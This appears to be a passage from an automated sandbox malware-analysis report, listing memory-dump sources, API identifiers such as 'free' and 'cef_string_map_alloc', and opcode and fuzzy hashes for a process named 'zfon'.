                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: e9784d97df34b852811b729b75ab69608f0340d97476c982831835ccf36363d0
                                                                                                                                                                            • Instruction ID: 9e46af5fad257e7ecb94925eaa7f93e18d0c77cd6fbd796ff1fa6cbb9bae6b80
                                                                                                                                                                            • Opcode Fuzzy Hash: e9784d97df34b852811b729b75ab69608f0340d97476c982831835ccf36363d0
                                                                                                                                                                            • Instruction Fuzzy Hash: 39512C36B4AF4281EF11AB28E488268B3A6FB45F94F559636CB4D43764EF39D844C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1669350605-0
                                                                                                                                                                            • Opcode ID: 97cef294c8234e24996934a69e811e08a35bd6dc2cc65fa79cb0f422811af0d6
                                                                                                                                                                            • Instruction ID: e1802fed1123c2e83320b16666b2a14b6bc4f0b7a4fe2d5afa7b3a8b64bf8020
                                                                                                                                                                            • Opcode Fuzzy Hash: 97cef294c8234e24996934a69e811e08a35bd6dc2cc65fa79cb0f422811af0d6
                                                                                                                                                                            • Instruction Fuzzy Hash: D7E1BF6AB18A8686FB108F79C4442AE63B1FB48B48F54A131EE4D77795EF3CD44AC710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1669350605-0
                                                                                                                                                                            • Opcode ID: b568904929ef177ea3e5454489a4b32e3a5935e52dbc23fadad983666b9a9220
                                                                                                                                                                            • Instruction ID: 7c24188e22c5b226bcdd58dad662ea538a383502afc74cbd0c6618ffe815e079
                                                                                                                                                                            • Opcode Fuzzy Hash: b568904929ef177ea3e5454489a4b32e3a5935e52dbc23fadad983666b9a9220
                                                                                                                                                                            • Instruction Fuzzy Hash: F5E19F6AB18A8286FB118F79C4442AE63B1FB48B48F559135DE4D37794EF3CD44AC710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 5e4904112bc70dfaf0cd0831b4c3e5b204e79148fe6a76846035a198c2a67414
                                                                                                                                                                            • Instruction ID: 07a5a057519a5be9e3b2d0c7f87503ed2a8b9e69f08e830112981b900e68c368
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e4904112bc70dfaf0cd0831b4c3e5b204e79148fe6a76846035a198c2a67414
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C018F2765DE8281DF21EB30D041378A3B6FB84BB8FA45631DA2D46AD5DF28D4958320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                            • Opcode ID: 3527a2ec92af913d7f7e1f06c3a52e2048bea7df529658eb449da16ed24f77af
                                                                                                                                                                            • Instruction ID: f9931e99d9c37f56599b7e839c22cd50c761c6707685b27813848535f3341d19
                                                                                                                                                                            • Opcode Fuzzy Hash: 3527a2ec92af913d7f7e1f06c3a52e2048bea7df529658eb449da16ed24f77af
                                                                                                                                                                            • Instruction Fuzzy Hash: F29129ABE0869289F7118F70D8403BA37B1BB44758F666035DE4D377A9DF78A846CB40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                                                                                            • Instruction ID: 779f5a60edb9dd0d5aeeb45872b1e39020c86f3f00e2ac5cf23e79495b6726a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C715027B09B8289FF21DFB4E4402ADBBB6AB44758F444075DE8D27B59DE38C426C364
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 178571748c1f6b41fb67adfce5d8230ea5df66adfb37037394259fba66d6769e
                                                                                                                                                                            • Instruction ID: ce541bdbfabe13f7d4b4caf753d5b79d605add5b80519a707c512ab7edfc2093
                                                                                                                                                                            • Opcode Fuzzy Hash: 178571748c1f6b41fb67adfce5d8230ea5df66adfb37037394259fba66d6769e
                                                                                                                                                                            • Instruction Fuzzy Hash: 58618A63B05A8285EF24EF65E4402ACA7B2FB44B98F988435DE0D17B95DF38D856C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 811f5f7df03e4e301300a13012f2cad1700dfafc7e0f81aadfde158a6b6bfa72
                                                                                                                                                                            • Instruction ID: 7bce0f7ca2b315049d95c6de7d450623066759f4f69761e5ed0269cd57603656
                                                                                                                                                                            • Opcode Fuzzy Hash: 811f5f7df03e4e301300a13012f2cad1700dfafc7e0f81aadfde158a6b6bfa72
                                                                                                                                                                            • Instruction Fuzzy Hash: 94618D63B05B8285EF24EB65D4402ADA7B2FB44B98F998435DF0C17B95DF38E445C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID: H
                                                                                                                                                                            • API String ID: 1294909896-2852464175
                                                                                                                                                                            • Opcode ID: 8f5110f9e4781b45c3775bc87bf2a545de0990f1d9289061d4064065fc1216d8
                                                                                                                                                                            • Instruction ID: 1f318453b0a3f87103071ad1a431f3a1dc9ee37fa07caf8e1a4aa2dca03629ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f5110f9e4781b45c3775bc87bf2a545de0990f1d9289061d4064065fc1216d8
                                                                                                                                                                            • Instruction Fuzzy Hash: F4616D7374AB8682EF259F25D545228B7B5FB46B90F598839CB9D03790DF38E6A0C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2675522757-0
                                                                                                                                                                            • Opcode ID: bcef8a7eb3371c1d10f51197cd9fa49dbabc02a3fcdca66b90c5840cacfef3be
                                                                                                                                                                            • Instruction ID: b846e90c4a2f91affae0b71a7b2a6676ba475b719fc9b1715393675255c1bd15
                                                                                                                                                                            • Opcode Fuzzy Hash: bcef8a7eb3371c1d10f51197cd9fa49dbabc02a3fcdca66b90c5840cacfef3be
                                                                                                                                                                            • Instruction Fuzzy Hash: A651C82354964341EE30AB25E4407BAE7B3EF487A4F980636DA5D077E5DF3CE8898720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 764de21c2739535333701c34ddd89eb00324bc8f6fca46ffdd7256b3f34d3a35
                                                                                                                                                                            • Instruction ID: a6144b55528a9c09f68d2e49f67b37a17bb9996a1cc6093b7c21b66ef28367cb
                                                                                                                                                                            • Opcode Fuzzy Hash: 764de21c2739535333701c34ddd89eb00324bc8f6fca46ffdd7256b3f34d3a35
                                                                                                                                                                            • Instruction Fuzzy Hash: 75418E73B09B8285EF259B25E4006A9B7A2FB44B98F988535CF9C07784DF38E985C350
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 38c0154fc2ebe3a2842d2e6c07cffeee60fb038aafe1afa7b16cf9b35fa85edf
                                                                                                                                                                            • Instruction ID: 293f3fa1840a7665f992df47a08f47685c0b136389f4705dd7bf118ce9e4032c
                                                                                                                                                                            • Opcode Fuzzy Hash: 38c0154fc2ebe3a2842d2e6c07cffeee60fb038aafe1afa7b16cf9b35fa85edf
                                                                                                                                                                            • Instruction Fuzzy Hash: 51417C73709B82C4EF299B25E500269B7A1FB44B98F988535CF9D47784DF38E945C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2716750221-0
                                                                                                                                                                            • Opcode ID: 7a11b1e22366df953c56bcdb6bf69edafa6fe217a70891a973f310d91d7d0277
                                                                                                                                                                            • Instruction ID: 70d6af64b2048d03615aecc720e50200e7a6fd79541698c63b0cde09c4896c58
                                                                                                                                                                            • Opcode Fuzzy Hash: 7a11b1e22366df953c56bcdb6bf69edafa6fe217a70891a973f310d91d7d0277
                                                                                                                                                                            • Instruction Fuzzy Hash: B241A3B9A0CB4281EB15DF35D8501BB6360EB55BE0F682231EA9D677E5DF3CE4528B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234106055-0
                                                                                                                                                                            • Opcode ID: 07b5da062168d5669a39c56d43f65f3b717084410d52d1df7f7576f4b81ce3ea
                                                                                                                                                                            • Instruction ID: d5fe4ef5a3d4f25d81a94f7cbf0477ec392c095c117d5a96d98b7ba53d8f026d
                                                                                                                                                                            • Opcode Fuzzy Hash: 07b5da062168d5669a39c56d43f65f3b717084410d52d1df7f7576f4b81ce3ea
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A3127EAA0C74182F7258F26E85037F6B95EB85B80F981035DA8D57799EE3CE464CF10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
